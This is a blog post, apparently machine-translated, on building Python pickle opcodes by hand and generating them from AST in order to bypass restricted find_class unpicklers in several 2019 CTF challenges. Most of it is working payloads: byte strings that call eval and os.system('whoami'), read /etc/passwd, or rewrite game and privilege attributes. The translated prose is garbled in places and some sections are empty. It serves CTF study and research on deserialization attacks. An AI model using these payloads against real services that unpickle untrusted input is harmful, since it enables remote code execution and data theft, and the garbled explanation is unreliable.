construct pickle opcode by ast

Posted by tzul at 2020-03-07

0x00 Preface

This paper will summarize some tips of hand ripped pickle by analyzing several questions of this year about how to realize bypass through handwritten pickle opcode

And automatic generation of pickle opcode by traversing Python AST

0x01 brief introduction to pickle

There are a lot of online materials, so I will not fill in redundant information to the Internet any more

Only a few characteristics of Pickle are summarized

str int float list tuple dict dict list callable _Pickler.find_class find_class getattr(__import__(module), name) \n

0x02 opcode Brief

Pickle common opcode, complete can be found in $Python / lib /

$PYTHON/Lib/ __dict__ find_class find_class

The corresponding implementations can be viewed in the load member function of pickle. Unpickler. Select two common ones:

pickle._Unpickler load_*

Pop mark is to pop all the elements on MARK (to a list, and then push back to the stack. So it needs to be constructed like this (I0 \ Ni1 \ NL

pop_mark ( (I0\nI1\nl

After reading the Inst instruction, read back two operands, call find_class, and then pop up the parameters above mark on the stack, and call the callable object to instantiate, so construct (s'ls' \ Nios \ nsystem \ n

find_class (S'ls'\nios\nsystem\n.

0x03 what does the official demo limit

The official security deserialization is that it inherits the pickle.picker class and overloads the find UU class method

pickle.Pickler find_class

The original operation of the parent class is to import the module into the sys.module cache (not into the global or local scope), and then getattr value, so after overloading the method, module and name can be restricted


Which operators call find u class?

find_class GLOBAL:c INST :i 还有protocol4的STACK_GLOBAL:\x93 # same as GLOBAL but using names on the stacks

However, the limitation of find class is only to filter the parameters of this function, and there is no function such as hook \\\\\\\\\\\\\\\\\\\\\\

find_class __import__ eval('__import__(\'xx\')')

0x04 bypass method

Take code breaking for example. The operation of bypass is:

Here are a few points:

__import__ __builtins__ __import__('builtins').xx __builtin__ __import__ __builtins__ globals()['__builtins__']

0x05 automatic construction

It's easy to construct, but it's troublesome to write assembly instructions after all. We can find a way to realize automatic Python source code = > pickle opcode

What can we do:

It's almost enough to deal with common constructs. To summarize, we support three kinds of single line expressions:

0x06 traverse AST node

Python's ast.nodevisitor implements the function of dynamically parsing class methods like metaclass. We traverse these three statements


Pickler's setup item implements the main parsing logic:


It corresponds to several situations of left value and right value in assignment statement above


Test several questions of this year

0x08 Code_breaking

$ cat test/code_breaking getattr = GLOBAL('builtins', 'getattr') dict = GLOBAL('builtins', 'dict') dict_get = getattr(dict, 'get') globals = GLOBAL('builtins', 'globals') builtins = globals() __builtins__ = dict_get(builtins, '__builtins__') eval = getattr(__builtins__, 'eval') eval('__import__("os").system("whoami")') return $ python3 < test/code_breaking b'cbuiltins\ngetattr\np0\n0cbuiltins\ndict\np1\n0g0\n(g1\nS\'get\'\ntRp2\n0cbuiltins\nglobals\np3\n0g3\n(tRp4\n0g2\n(g4\nS\'__builtins__\'\ntRp5\n0g0\n(g5\nS\'eval\'\ntRp6\n0g6\n(S\'__import__("os").system("whoami")\'\ntR.' $ cat test/SUCTF2019_guess_game_1 Game = GLOBAL('guess_game.Game', 'Game') game = GLOBAL('guess_game', 'game') game.round_count = 10 game.win_count = 10 ticket = INST('guess_game.Ticket', 'Ticket', 6) return ticket $ python3 < test/SUCTF2019_guess_game_1 b"cguess_game.Game\nGame\np0\n0cguess_game\ngame\np1\n0g1\n(N(S'round_count'\nI10\ndtbg1\n(N(S'win_count'\nI10\ndtb(I6\niguess_game.Ticket\nTicket\np4\n0g4\n."

Method two:

$ cat test/SUCTF2019_guess_game_2 ticket = INST('guess_game.Ticket', 'Ticket', 0) game = GLOBAL('guess_game', 'game') game.curr_ticket = ticket return ticket $ python3 < test/SUCTF2019_guess_game_2 b"(I0\niguess_game.Ticket\nTicket\np0\n0cguess_game\ngame\np1\n0g1\n(N(S'curr_ticket'\ng0\ndtbg0\n." $ cat test/BalsnCTF2019_Pyshv1 modules = GLOBAL('sys', 'modules') modules['sys'] = modules module_get = GLOBAL('sys', 'get') os = module_get('os') modules['sys'] = os system = GLOBAL('sys', 'system') system('whoami') return $ python3 < test/BalsnCTF2019_Pyshv1 b"csys\nmodules\np0\n0g0\nS'sys'\ng0\nscsys\nget\np2\n0g2\n(S'os'\ntRp3\n0g0\nS'sys'\ng3\nscsys\nsystem\np5\n0g5\n(S'whoami'\ntR." $ cat test/BalsnCTF2019_Pyshv2 __dict__ = GLOBAL('structs', '__dict__') builtins = GLOBAL('structs', '__builtins__') gtat = GLOBAL('structs', '__getattribute__') builtins['__import__'] = gtat __dict__['structs'] = builtins builtin_get = GLOBAL('structs', 'get') eval = builtin_get('eval') eval('open("/etc/passwd").read()') return $ python3 < test/BalsnCTF2019_Pyshv2 b'cstructs\n__dict__\np0\n0cstructs\n__builtins__\np1\n0cstructs\n__getattribute__\np2\n0g1\nS\'__import__\'\ng2\nsg0\nS\'structs\'\ng1\nscstructs\nget\np5\n0g5\n(S\'eval\'\ntRp6\n0g6\n(S\'open("/etc/passwd").read()\'\ntR.' $ cat test/BalsnCTF2019_Pyshv3 User = GLOBAL('structs', 'User') User.__set__ = User user = User(0, 0) User.privileged = user return user $ python3 < test/BalsnCTF2019_Pyshv3 b"cstructs\nUser\np0\n0g0\n(N(S'__set__'\ng0\ndtbg0\n(I0\nI0\ntRp2\n0g0\n(N(S'privileged'\ng2\ndtbg2\n."

Here's another one:

The instance method is a class method that automatically binds the instance itself, which is completely consistent with the function signature. The method of getting the instance directly has bound the first parameter, which can be regarded as the currification of the function

The Zu set Zu method of a class needs to be defined when the class is defined, and the setter also needs to be set for the class member (the class member is a member of the class object, and the instance member is private to each instance (we also see the prophet group master asking today))

__set__ setter

In Python 3, the class attribute CLS. Dict is a mappingproxy proxy object, which does not support the modification of direct CLS. Dict ['x '] = 0. Therefore, in the generation of pickle opcode, I use the method (} (I0 \ Ni1 \ ndtb) in a unified way. The reason is that the load build method in the pickle source code:

cls.__dict__ cls.__dict__['x'] = 0 (}(I0\nI1\ndtb

In fact, logically speaking, as long as the first value of the tuple is null, but the module actually imports the "pickle" module. Unlike the function implementation listed here, it requires that the first value must be dict (or none)


0x0b repo address

The complete code is at

I love you!